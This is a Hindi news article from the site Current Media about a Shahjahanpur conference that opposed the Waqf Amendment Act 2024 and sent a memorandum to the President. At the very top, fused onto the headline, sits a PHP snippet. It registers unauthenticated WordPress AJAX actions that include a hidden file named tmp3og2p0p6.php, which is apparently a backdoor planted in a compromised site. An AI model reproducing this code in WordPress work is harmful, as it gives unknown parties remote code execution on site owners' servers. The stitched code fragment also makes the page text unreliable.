if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }वक्फ संशोधन अधिनियम 2024 को वापस लेने की मांग - Current Media

वक्फ संशोधन अधिनियम 2024 को वापस लेने की मांग

शाहजहांपुर। मो0 आफाक। सरकार द्वारा लाए जा रहे वक्फ संशोधन बिल को लेकर पूरे देश में मुसलमानों द्वारा लगातार एतराज व एहतिजाज किया जा रहा है । इसी सिलसिले में जिला शाहजहॉंपर में वक्फ संशोधन को लेकर एक कार्यक्रम का आयोजल किया गया जिसमें अध्यक्ष मौलाना हुजूर अहमद मंजरी , इमाम जामा मस्जिद, मौलाना डॉक्टर यासीन अली उस्मानी सेक्रेटरी, ऑल इंडिया मुस्लिम पर्सनल लॉ बोर्ड के संरक्षक तथा सैयद कासिम रजा सेक्रेटरी ईदगाह की प्रबंधन समिति के संयोजन में तहफ्फूज़ औकाफ कॉन्फ्रेंस का आयोजन किया गया। जिसमें वक्फ संशोधन अधिनियम 2024 बिल का जोरदार विरोध किया गया और राष्ट्रपति के नाम संबोधित ज्ञापन मजिस्ट्रेट को सौंपा गया।
ज्ञापन में मांग की गई है कि प्रस्तावित वक्फ संशोधन अधिनियम 2024 को जनहित में वापस लिया जाए इसकी मांग की गई। साथ ही महामहिमा राष्ट्रपति महोदया से मस्जिदों, मजारों, खानक़ाहों, मदरसों आदि की पूर्ण सुरक्षा एवं संरक्षण प्रदान किये जाने की मांग की गई।
कॉन्फ्रेंस में समाजवादी पार्टी व कांग्रेस पार्टी के अन्य जिलों से आए नेताओं व स्थानीय नेताओं के साथ-साथ बड़ी संख्या में आम लोगों ने शिरकत कर वक्फ संशोधन अधिनियम 2024 बिल को वापस किए जाने की मांग की। ईदगगाह की प्रबंधन समिति के सेक्रेटरी सैयद कासिम रज़ा ने मंच से ज्ञापन को पढ़कर सुनाया।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …